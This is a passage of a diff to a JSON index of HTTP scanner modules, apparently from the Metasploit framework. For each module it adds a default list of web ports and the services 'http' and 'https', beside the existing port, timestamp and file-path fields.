8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dir_listing.rb", @@ -15342,6 +20458,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dir_scanner.rb", @@ -15375,6 +20506,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb", @@ -15404,6 +20550,21 @@ "platform": "", "arch": "", "rport": 2222, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-20 15:09:11 +0000", "path": "/modules/auxiliary/scanner/http/directadmin_login.rb", @@ -15434,6 +20595,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb", @@ -15464,6 +20640,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb", @@ -15494,6 +20685,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb", @@ -15525,6 +20731,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb", @@ -15557,6 +20778,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb", @@ -15586,6 +20822,21 @@ "platform": "", "arch": "", "rport": 2375, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 02:56:47 +0000", "path": "/modules/auxiliary/scanner/http/docker_version.rb", @@ -15615,6 +20866,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dolibarr_login.rb", @@ -15646,6 +20912,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/drupal_views_user_enum.rb", @@ -15675,6 +20956,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb", @@ -15707,6 +21003,21 @@ "platform": "", "arch": "", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/elasticsearch_traversal.rb", @@ -15736,6 +21047,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/enum_wayback.rb", @@ -15765,6 +21082,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:53:02 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb", @@ -15795,6 +21127,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 17:02:16 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb", @@ -15825,6 +21172,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-23 00:14:27 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb", @@ -15855,6 +21217,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-23 00:14:27 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb", @@ -15885,6 +21262,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-23 00:14:27 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb", @@ -15914,6 +21306,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:48:41 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb", @@ -15943,6 +21350,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/error_sql_injection.rb", @@ -15972,6 +21394,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb", @@ -16003,6 +21440,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb", @@ -16034,6 +21486,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb", @@ -16063,6 +21530,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb", @@ -16092,6 +21574,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/files_dir.rb", @@ -16124,6 +21621,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-21 12:44:10 +0000", "path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb", @@ -16154,6 +21666,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/frontpage_login.rb", @@ -16183,6 +21710,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb", @@ -16213,6 +21755,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/git_scanner.rb", @@ -16242,6 +21799,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/gitlab_login.rb", @@ -16271,6 +21843,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb", @@ -16302,6 +21889,21 @@ "platform": "", "arch": "", "rport": 4848, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/glassfish_login.rb", @@ -16334,6 +21936,21 @@ "platform": "", "arch": "", "rport": 4848, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-05 00:15:04 +0000", "path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb", @@ -16365,6 +21982,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb", @@ -16398,6 +22030,21 @@ "platform": "", "arch": "", "rport": 7181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb", @@ -16429,6 +22076,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/host_header_injection.rb", @@ -16462,6 +22124,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb", @@ -16495,6 +22172,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb", @@ -16528,6 +22220,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb", @@ -16561,6 +22268,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb", @@ -16594,6 +22316,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb", @@ -16626,6 +22363,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb", @@ -16658,6 +22410,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb", @@ -16690,6 +22457,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb", @@ -16719,6 +22501,21 @@ "platform": "", "arch": "", "rport": 2381, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb", @@ -16750,6 +22547,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_header.rb", @@ -16779,6 +22591,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_hsts.rb", @@ -16808,6 +22635,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8081, + 8444 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_login.rb", @@ -16839,6 +22683,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_put.rb", @@ -16870,6 +22729,21 @@ "platform": "", "arch": "", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-06-25 17:24:13 +0000", "path": "/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb", @@ -16902,6 +22776,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-13 06:20:57 +0000", "path": "/modules/auxiliary/scanner/http/http_traversal.rb", @@ -16931,6 +22820,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_version.rb", @@ -16960,6 +22864,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb", @@ -16990,6 +22900,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-06-19 14:55:53 +0000", "path": "/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb", @@ -17019,6 +22944,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb", @@ -17048,6 +22988,21 @@ "platform": "", "arch": "", "rport": 8086, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/influxdb_enum.rb", @@ -17077,6 +23032,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/infovista_enum.rb", @@ -17108,6 +23078,21 @@ "platform": "", "arch": "", "rport": 16992, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb", @@ -17137,6 +23122,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ipboard_login.rb", @@ -17169,6 +23169,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/http/jboss_status.rb", @@ -17199,6 +23214,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb", @@ -17232,6 +23262,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/jenkins_command.rb", @@ -17261,6 +23306,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-01 15:32:32 +0000", "path": "/modules/auxiliary/scanner/http/jenkins_enum.rb", @@ -17290,6 +23350,22 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8081 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/jenkins_login.rb", @@ -17319,6 +23395,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb", @@ -17348,6 +23439,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb", @@ -17378,6 +23484,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb", @@ -17407,6 +23528,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-31 11:37:10 +0000", "path": "/modules/auxiliary/scanner/http/joomla_pages.rb", @@ -17436,6 +23572,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_plugins.rb", @@ -17465,6 +23616,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_version.rb", @@ -17495,6 +23661,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/kodi_traversal.rb", @@ -17525,6 +23706,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb", @@ -17558,6 +23754,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb", @@ -17591,6 +23802,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb", @@ -17620,6 +23846,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/lucky_punch.rb", @@ -17653,6 +23894,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb", @@ -17682,6 +23938,21 @@ "platform": "", "arch": "", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb", @@ -17712,6 +23983,21 @@ "platform": "", "arch": "", "rport": 6060, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb", @@ -17744,6 +24030,21 @@ "platform": "", "arch": "", "rport": 6060, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb", @@ -17775,6 +24076,21 @@ "platform": "", "arch": "", "rport": 6262, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb", @@ -17808,6 +24124,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb", @@ -17839,6 +24170,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + 